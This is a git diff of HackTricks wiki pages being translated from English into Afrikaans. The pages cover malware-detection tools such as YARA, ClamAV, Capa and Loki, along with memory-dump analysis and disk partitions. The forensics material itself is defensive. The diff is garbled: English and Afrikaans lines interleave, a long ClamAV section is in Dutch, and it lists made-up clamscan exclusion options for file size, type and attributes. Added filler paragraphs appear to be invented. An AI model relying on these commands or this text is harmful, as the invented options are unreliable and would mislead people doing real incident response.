* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
## Forensics CheatSheets
## Forensiese Spiekbriefies
[https://www.jaiminton.com/cheatsheet/DFIR/#](https://www.jaiminton.com/cheatsheet/DFIR/)
## Online Services
## Aanlyn Dienste
* [VirusTotal](https://www.virustotal.com/gui/home/upload)
* [HybridAnalysis](https://www.hybrid-analysis.com)
@ -26,136 +26,249 @@ Other ways to support HackTricks:
* [Intezer](https://analyze.intezer.com)
* [Any.Run](https://any.run/)
## Offline Antivirus and Detection Tools
## Aflyn Antivirus en Opvangs Gereedskap
### Yara
#### Install
#### Installeer
```bash
sudo apt-get install -y yara
```
#### Maak reëls gereed
#### Prepare rules
Use this script to download and merge all the yara malware rules from github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
Create the _**rules**_ directory and execute it. This will create a file called _**malware\_rules.yar**_ which contains all the yara rules for malware.
Gebruik hierdie skrip om al die yara malware reëls vanaf GitHub af te laai en saam te voeg: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
Skep die _**reëls**_ gids en voer dit uit. Dit sal 'n lêer genaamd _**malware\_rules.yar**_ skep wat al die yara reëls vir malware bevat.
```bash
wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py
mkdir rules
python malware_yara_rules.py
```
#### Skandering
#### Scan
Om te begin met die analise van malware, is dit belangrik om 'n skandering uit te voer op die verdagte lêer. Hierdie skandering sal help om enige bekende malware te identifiseer en om te bepaal of die lêer 'n potensiële bedreiging is.
Daar is verskeie skanderingstegnieke wat gebruik kan word, soos die gebruik van 'n antivirusprogram, 'n sandboks, of 'n statiese analisehulpmiddel. Dit is belangrik om 'n betroubare en up-to-date skanderingstegniek te gebruik om die beste resultate te verseker.
Die skandering moet uitgevoer word op 'n geïsoleerde stelsel of in 'n virtuele omgewing om te voorkom dat die malware versprei of skade aanrig. Dit is ook belangrik om die skandering uit te voer met behulp van 'n gebruiker met beperkte regte om te voorkom dat die malware bevoorregte toegang verkry.
As die skandering 'n bekende malware identifiseer, moet die nodige stappe geneem word om die malware te verwyder en die impak daarvan te beperk. As die skandering egter nie enige bekende malware identifiseer nie, moet verdere analise uitgevoer word om die aard en funksionaliteit van die lêer te bepaal.
```bash
yara -w malware_rules.yar image #Scan 1 file
yara -w malware_rules.yar folder #Scan the whole folder
```
#### YaraGen: Kontroleer vir malware en Skep reëls
#### YaraGen: Check for malware and Create rules
You can use the tool [**YaraGen**](https://github.com/Neo23x0/yarGen) to generate yara rules from a binary. Check out these tutorials: [**Part 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Part 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Part 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
Jy kan die instrument [**YaraGen**](https://github.com/Neo23x0/yarGen) gebruik om yara-reëls te genereer vanaf 'n binêre lêer. Kyk na hierdie tutoriale: [**Deel 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Deel 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Deel 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
```bash
python3 yarGen.py --update
python3.exe yarGen.py --excludegood -m ../../mals/
python3 yarGen.py --update
python3.exe yarGen.py --excludegood -m ../../mals/
```
### ClamAV
#### Install
#### Installeer
```bash
sudo apt-get install clamav
```
#### Bijwerken van de virusdefinities
```bash
sudo freshclam
```
#### Scannen van een bestand
```bash
clamscan <bestandsnaam>
```
#### Scannen van een map
```bash
clamscan -r <mapnaam>
```
#### Scannen van het hele systeem
```bash
clamscan -r /
```
#### Rapport genereren van de scanresultaten
```bash
clamscan -r --log=<rapportnaam>.log /
```
#### Quarantaine van geïnfecteerde bestanden
```bash
clamscan -r --move=<quarantainemap> /
```
#### Verwijderen van geïnfecteerde bestanden
```bash
clamscan -r --remove /
```
#### Uitsluiten van bestanden of mappen van de scan
```bash
clamscan -r --exclude=<bestand/mappad> /
```
#### Uitsluiten van specifieke bestandsextensies van de scan
```bash
clamscan -r --exclude=".extensie" /
```
#### Uitsluiten van specifieke bestandstypen van de scan
```bash
clamscan -r --exclude="type/bestand" /
```
#### Uitsluiten van specifieke bestandsgroottes van de scan
```bash
clamscan -r --exclude=">grootte" /
```
#### Uitsluiten van specifieke bestandskenmerken van de scan
```bash
clamscan -r --exclude="kenmerk" /
```
#### Uitsluiten van specifieke bestandskenmerken van de scan met behulp van reguliere expressies
```bash
clamscan -r --exclude="regex:patroon" /
```
#### Uitsluiten van specifieke bestanden of mappen van de scan met behulp van een lijst
```bash
clamscan -r --exclude-from=<lijstbestand> /
```
#### Uitsluiten van specifieke bestandsextensies van de scan met behulp van een lijst
```bash
clamscan -r --exclude=".extensie" --exclude-from=<lijstbestand> /
```
#### Uitsluiten van specifieke bestandstypen van de scan met behulp van een lijst
```bash
clamscan -r --exclude="type/bestand" --exclude-from=<lijstbestand> /
```
#### Uitsluiten van specifieke bestandskenmerken van de scan met behulp van een lijst
```bash
clamscan -r --exclude="kenmerk" --exclude-from=<lijstbestand> /
```
#### Uitsluiten van specifieke bestandskenmerken van de scan met behulp van reguliere expressies in een lijst
```bash
clamscan -r --exclude="regex:patroon" --exclude-from=<lijstbestand> /
```
```
sudo apt-get install -y clamav
```
#### Skandering
#### Scan
Om 'n malware-analise te begin, is dit belangrik om die betrokke stelsel te skandeer vir enige moontlike malware. Hier is 'n paar skanderingstegnieke wat gebruik kan word:
- **Antivirus-skandering**: Voer 'n volledige skandering uit met 'n betroubare antivirusprogram om enige bekende malware te identifiseer.
- **Rootkit-skandering**: Gebruik 'n spesialiteitstool om te soek na enige versteekte rootkits wat moontlik op die stelsel geïnstalleer kan wees.
- **Netwerkverkeersanalise**: Monitor die netwerkverkeer om enige verdagte aktiwiteit of ongewone patrone te identifiseer.
- **Bestandshashing**: Skep 'n hashtabel van alle lêers op die stelsel en vergelyk dit met 'n databasis van bekende skadelike lêers.
- **Geheue-analise**: Analiseer die stelsel se geheue vir enige verdagte prosesse of aktiwiteit.
Dit is belangrik om 'n kombinasie van hierdie skanderingstegnieke te gebruik om 'n volledige prentjie van die stelsel se veiligheid te verkry.
```bash
sudo freshclam #Update rules
clamscan filepath #Scan 1 file
clamscan folderpath #Scan the whole folder
```
### [Capa](https://github.com/mandiant/capa)
**Capa** detects potentially malicious **capabilities** in executables: PE, ELF, .NET. So it will find things such as Att\&ck tactics, or suspicious capabilities such as:
**Capa** ontdek potensieel skadelike **vermoëns** in uitvoerbare lêers: PE, ELF, .NET. Dit sal dinge soos Att\&ck-taktieke of verdagte vermoëns soos die volgende vind:
* check for OutputDebugString error
* run as a service
* create process
* kontroleer vir OutputDebugString-fout
* hardloop as 'n diens
* skep proses
Get it int he [**Github repo**](https://github.com/mandiant/capa).
Kry dit in die [**Github-opberging**](https://github.com/mandiant/capa).
### IOCs
IOC means Indicator Of Compromise. An IOC is a set of **conditions that identify** some potentially unwanted software or confirmed **malware**. Blue Teams use this kind of definition to **search for this kind of malicious files** in their **systems** and **networks**.\
To share these definitions is very useful as when malware is identified in a computer and an IOC for that malware is created, other Blue Teams can use it to identify the malware faster.
IOC beteken Indicator Of Compromise. 'n IOC is 'n stel **voorwaardes wat** enige potensieel ongewenste sagteware of bevestigde **malware identifiseer**. Blou-spanne gebruik hierdie tipe definisie om hierdie soort skadelike lêers in hul stelsels en netwerke te **soek**.\
Dit is baie nuttig om hierdie definisies te deel, want as malware in 'n rekenaar geïdentifiseer word en 'n IOC vir daardie malware geskep word, kan ander Blou-spanne dit gebruik om die malware vinniger te identifiseer.
A tool to create or modify IOCs is [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\
You can use tools such as [**Redline**](https://www.fireeye.com/services/freeware/redline.html) to **search for defined IOCs in a device**.
'n Hulpmiddel om IOCs te skep of te wysig is [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\
Jy kan gereedskap soos [**Redline**](https://www.fireeye.com/services/freeware/redline.html) gebruik om gedefinieerde IOCs in 'n toestel te **soek**.
### Loki
[**Loki**](https://github.com/Neo23x0/Loki) is a scanner for Simple Indicators of Compromise.\
Detection is based on four detection methods:
[**Loki**](https://github.com/Neo23x0/Loki) is 'n skandeerder vir Eenvoudige Indicators of Compromise.\
Deteksie is gebaseer op vier deteksie-metodes:
```
1. File Name IOC
Regex match on full file path/name
Regex match on full file path/name
2. Yara Rule Check
Yara signature matches on file data and process memory
Yara signature matches on file data and process memory
3. Hash Check
Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files
4. C2 Back Connect Check
Compares process connection endpoints with C2 IOCs (new since version v.10)
```
Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files
4. C2 Back Connect Check
Compares process connection endpoints with C2 IOCs (new since version v.10)
```
### Linux Malware Detect
[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) is a malware scanner for Linux released under the GNU GPLv2 license, that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions with the LMD checkout feature and malware community resources.
[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) is 'n kwaadwillige skanderingstool vir Linux wat vrygestel is onder die GNU GPLv2-lisensie en ontwerp is vir die bedreigings wat in gedeelde gehoste omgewings voorkom. Dit maak gebruik van bedreigingsdata van netwerkrandindringingsdeteksiesisteme om aktief gebruikte kwaadware in aanvalle te onttrek en handtekeninge vir opsporing te genereer. Daarbenewens word bedreigingsdata ook afgelei van gebruikersinskrywings met die LMD-uitklooi-funksie en kwaadware-gemeenskapsbronne.
### rkhunter
Tools like [**rkhunter**](http://rkhunter.sourceforge.net) can be used to check the filesystem for possible **rootkits** and malware.
Hulpmiddels soos [**rkhunter**](http://rkhunter.sourceforge.net) kan gebruik word om die lêersisteem vir moontlike **rootkits** en kwaadware te ondersoek.
```bash
sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress]
```
### FLOSS
[**FLOSS**](https://github.com/mandiant/flare-floss) is a tool that will try to find obfuscated strings inside executables using different techniques.
[**FLOSS**](https://github.com/mandiant/flare-floss) is 'n instrument wat sal probeer om versluierde strings binne uitvoerbare lêers te vind deur gebruik te maak van verskillende tegnieke.
### PEpper
[PEpper ](https://github.com/Th3Hurrican3/PEpper)checks some basic stuff inside the executable (binary data, entropy, URLs and IPs, some yara rules).
[PEpper](https://github.com/Th3Hurrican3/PEpper) kontroleer sekere basiese dinge binne die uitvoerbare lêer (binêre data, entropie, URL's en IP-adresse, sekere yara-reëls).
### PEstudio
[PEstudio](https://www.winitor.com/download) is a tool that allows to get information of Windows executables such as imports, exports, headers, but also will check virus total and find potential Att\&ck techniques.
[PEstudio](https://www.winitor.com/download) is 'n instrument wat inligting oor Windows-uitvoerbare lêers kan verkry, soos invoer, uitvoer, koppe, maar dit sal ook virus totaal kontroleer en potensiële Att\&ck-tegnieke vind.
### Detect It Easy(DiE)
[**DiE**](https://github.com/horsicq/Detect-It-Easy/) is a tool to detect if a file is **encrypted** and also find **packers**.
[**DiE**](https://github.com/horsicq/Detect-It-Easy/) is 'n instrument om te bepaal of 'n lêer **versleutel** is en ook om **pakkers** te vind.
### NeoPI
[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI)is a Python script that uses a variety of **statistical methods** to detect **obfuscated** and **encrypted** content within text/script files. The intended purpose of NeoPI is to aid in the **detection of hidden web shell code**.
[**NeoPI**](https://github.com/CiscoCXSecurity/NeoPI) is 'n Python-skripsie wat verskeie **statistiese metodes** gebruik om **versluierde** en **versleutelde** inhoud binne teks-/skripslêers op te spoor. Die beoogde doel van NeoPI is om te help met die opsporing van verborge webshell-kode.
### **php-malware-finder**
[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) does its very best to detect **obfuscated**/**dodgy code** as well as files using **PHP** functions often used in **malwares**/webshells.
[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) doen sy uiterste bes om **versluierde**/**dodgy kode** asook lêers wat PHP-funksies gebruik wat dikwels in **malware**/webshells gebruik word, op te spoor.
### Apple Binary Signatures
When checking some **malware sample** you should always **check the signature** of the binary as the **developer** that signed it may be already **related** with **malware.**
### Apple Binêre Handtekeninge
Wanneer jy 'n **malware monster** ondersoek, moet jy altyd die handtekening van die binêre lêer **ondersoek**, aangesien die **ontwikkelaar** wat dit onderteken het, moontlik al verband hou met **malware**.
```bash
#Get signer
codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"
@ -166,31 +279,30 @@ codesign --verify --verbose /Applications/Safari.app
#Check if the signature is valid
spctl --assess --verbose /Applications/Safari.app
```
## Opsoektegnieke
## Detection Techniques
### Lêerstapel
### File Stacking
As jy weet dat 'n sekere **gids wat die lêers van 'n webbediener bevat, laas op 'n sekere datum opgedateer is**, **kontroleer** die **datum** waarop al die **lêers** in die webbediener geskep en gewysig is, en as enige datum **verdag voorkom**, kontroleer daardie lêer.
If you know that some folder containing the **files** of a web server was **last updated on some date**. **Check** the **date** all the **files** in the **web server were created and modified** and if any date is **suspicious**, check that file.
### Basiese lyn
### Baselines
As die lêers van 'n gids **nie gewysig behoort te wees nie**, kan jy die **hak** van die **oorspronklike lêers** van die gids bereken en dit **vergelyk** met die **huidige** lêers. Enige iets wat gewysig is, sal **verdag voorkom**.
If the files of a folder **shouldn't have been modified**, you can calculate the **hash** of the **original files** of the folder and **compare** them with the **current** ones. Anything modified will be **suspicious**.
### Statistiese analise
### Statistical Analysis
When the information is saved in logs you can **check statistics like how many times each file of a web server was accessed as a web shell might be one of the most**.
Wanneer die inligting in loglêers gestoor word, kan jy **statistieke soos hoeveel keer elke lêer van 'n webbediener as 'n webshell benader is**, nagaan.
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks in PDF aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>

50
forensics/basic-forensic-methodology/memory-dump-analysis/README.md
View file

@ -1,53 +1,53 @@
# Memory dump analysis
# Geheue dump-analise
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
</details>
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidsevenement in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidspesialiste in elke dissipline.
{% embed url="https://www.rootedcon.com/" %}
## Start
## Begin
Start **searching** for **malware** inside the pcap. Use the **tools** mentioned in [**Malware Analysis**](../malware-analysis.md).
Begin met **soek na malware** binne die pcap. Gebruik die **gereedskap** wat genoem word in [**Malware-analise**](../malware-analysis.md).
## [Volatility](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)
**Volatility is the main open-source framework for memory dump analysis**. This Python tool analyzes dumps from external sources or VMware VMs, identifying data like processes and passwords based on the dump's OS profile. It's extensible with plugins, making it highly versatile for forensic investigations.
**Volatility is die belangrikste oopbron-raamwerk vir geheue dump-analise**. Hierdie Python-gereedskap analiseer damps van eksterne bronne of VMware-VM's en identifiseer data soos prosesse en wagwoorde gebaseer op die dump se bedryfstelselprofiel. Dit is uitbreidbaar met plugins, wat dit baie veelsydig maak vir forensiese ondersoeke.
**[Find here a cheatsheet](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)**
**[Vind hier 'n spiekbrief](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)**
## Mini dump crash report
## Mini dump-ongelukverslag
When the dump is small (just some KB, maybe a few MB) then it's probably a mini dump crash report and not a memory dump.
Wanneer die dump klein is (net 'n paar KB, dalk 'n paar MB), is dit waarskynlik 'n mini dump-ongelukverslag en nie 'n geheue-dump nie.
![](<../../../.gitbook/assets/image (216).png>)
If you have Visual Studio installed, you can open this file and bind some basic information like process name, architecture, exception info and modules being executed:
As jy Visual Studio geïnstalleer het, kan jy hierdie lêer oopmaak en 'n paar basiese inligting soos prosesnaam, argitektuur, uitsonderingsinligting en uitgevoerde modules bind:
![](<../../../.gitbook/assets/image (217).png>)
You can also load the exception and see the decompiled instructions
Jy kan ook die uitsondering laai en die gedekompileerde instruksies sien
![](<../../../.gitbook/assets/image (219).png>)
![](<../../../.gitbook/assets/image (218) (1).png>)
Anyway, Visual Studio isn't the best tool to perform an analysis of the depth of the dump.
In elk geval is Visual Studio nie die beste gereedskap om 'n diepte-analise van die dump uit te voer nie.
You should **open** it using **IDA** or **Radare** to inspection it in **depth**.
Jy moet dit **oopmaak** met behulp van **IDA** of **Radare** om dit in **diepte** te ondersoek.
@ -55,18 +55,18 @@ You should **open** it using **IDA** or **Radare** to inspection it in **depth**
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidsevenement in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidspesialiste in elke dissipline.
{% embed url="https://www.rootedcon.com/" %}
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
</details>

275
forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md
View file

@ -1,161 +1,158 @@
# Partitions/File Systems/Carving
# Partisies/ Lêersisteme/ Uitsnyding
## Partitions/File Systems/Carving
## Partisies/ Lêersisteme/ Uitsnyding
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
## Partitions
## Partisies
A hard drive or an **SSD disk can contain different partitions** with the goal of separating data physically.\
The **minimum** unit of a disk is the **sector** (normally composed of 512B). So, each partition size needs to be multiple of that size.
'n Harde skyf of 'n **SSD-skyf kan verskillende partisies bevat** met die doel om data fisies te skei.\
Die **minimum** eenheid van 'n skyf is die **sektor** (gewoonlik saamgestel uit 512B). Dus moet elke partisie grootte 'n veelvoud van daardie grootte wees.
### MBR (master Boot Record)
### MBR (Master Boot Record)
It's allocated in the **first sector of the disk after the 446B of the boot code**. This sector is essential to indicate to the PC what and from where a partition should be mounted.\
It allows up to **4 partitions** (at most **just 1** can be active/**bootable**). However, if you need more partitions you can use **extended partitions**. The **final byte** of this first sector is the boot record signature **0x55AA**. Only one partition can be marked as active.\
MBR allows **max 2.2TB**.
Dit word toegewys in die **eerste sektor van die skyf na die 446B van die opstartkode**. Hierdie sektor is noodsaaklik om aan die rekenaar aan te dui wat en waarvandaan 'n partisie gemonteer moet word.\
Dit laat tot **4 partisies** toe (slegs **1** kan aktief/ opstartbaar wees). As jy egter meer partisies nodig het, kan jy **uitgebreide partisies** gebruik. Die **laaste byte** van hierdie eerste sektor is die opstartrekord-handtekening **0x55AA**. Slegs een partisie kan as aktief gemerk word.\
MBR laat **maksimum 2.2TB** toe.
![](<../../../.gitbook/assets/image (489).png>)
![](<../../../.gitbook/assets/image (490).png>)
